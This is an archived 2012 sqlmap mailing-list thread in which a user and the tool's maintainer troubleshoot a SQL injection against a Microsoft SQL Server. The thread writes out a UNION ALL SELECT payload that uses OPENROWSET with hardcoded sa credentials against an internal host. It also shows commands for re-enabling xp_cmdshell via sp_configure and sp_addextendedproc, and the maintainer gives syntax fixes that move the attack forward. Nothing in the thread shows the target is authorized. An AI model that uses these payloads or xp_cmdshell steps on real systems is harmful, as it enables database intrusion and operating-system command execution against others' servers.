Re: [sqlmap-users] error with ms sql
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] error with ms sql
|
From: Adi M. <adi...@ya...> - 2012-06-21 10:57:36
|
my feeling is that "[OLE/DB provider returned message: Deferred prepare could not be completed." is because of an sql error:) so my fault. and regarding the second error, I think you must always return some columns in the query , such as select @@version. now question is how do i embed a string inside another string delimited with quotes? Looks like double quotes is not working.....doubling quote '' looks like not working always.... ________________________________ From: Adi Mutu <adi...@ya...> To: Miroslav Stampar <mir...@gm...> Cc: "sql...@li..." <sql...@li...> Sent: Thursday, June 21, 2012 11:45 AM Subject: Re: [sqlmap-users] error with ms sql tried, same stuff. I've tried to reenable xp_cmdshell first with master..sp_configure 'show advanced options',1 reconfigure master..sp_configure 'xp_cmdshell',1 reconfigure and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.] then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ' and got error: OLE DB error trace [Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. ________________________________ From: Miroslav Stampar <mir...@gm...> To: Adi Mutu <adi...@ya...> Cc: "sql...@li..." <sql...@li...> Sent: Thursday, June 21, 2012 11:26 AM Subject: Re: [sqlmap-users] error with ms sql try with master..resultabcd i forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: Hi Miroslav, > > >got db_name master and tried with master.resultabcd but i get the same error. > > >Kind Regards, >A. > > > >________________________________ > From: Miroslav Stampar <mir...@gm...> >To: Adi Mutu <adi...@ya...> >Cc: "sql...@li..." <sql...@li...> >Sent: Thursday, June 21, 2012 11:11 AM >Subject: Re: [sqlmap-users] error with ms sql > > > >Hi Adi. > > >You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466) > > >Kind regards, >Miroslav Stampar > > >On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > >I'm having an injection like this: >>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4) >> >> >>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808 >> >> >> >>and when I try to select form resultabcd i get: >>[OLE/DB provider returned message: Deferred prepare could not be completed.] >> >> >> >>could not find a good answer with google. Thanks. >> >> >>Kind regards, >>A. >>------------------------------------------------------------------------------ >>Live Security Virtual Conference >>Exclusive live event will cover all the ways today's security and >>threat landscape has changed and how IT managers can respond. Discussions >>will include endpoint security, mobile security and the latest in malware >>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>_______________________________________________ >>sqlmap-users mailing list >>sql...@li... >>https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > >-- >Miroslav Stampar >http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
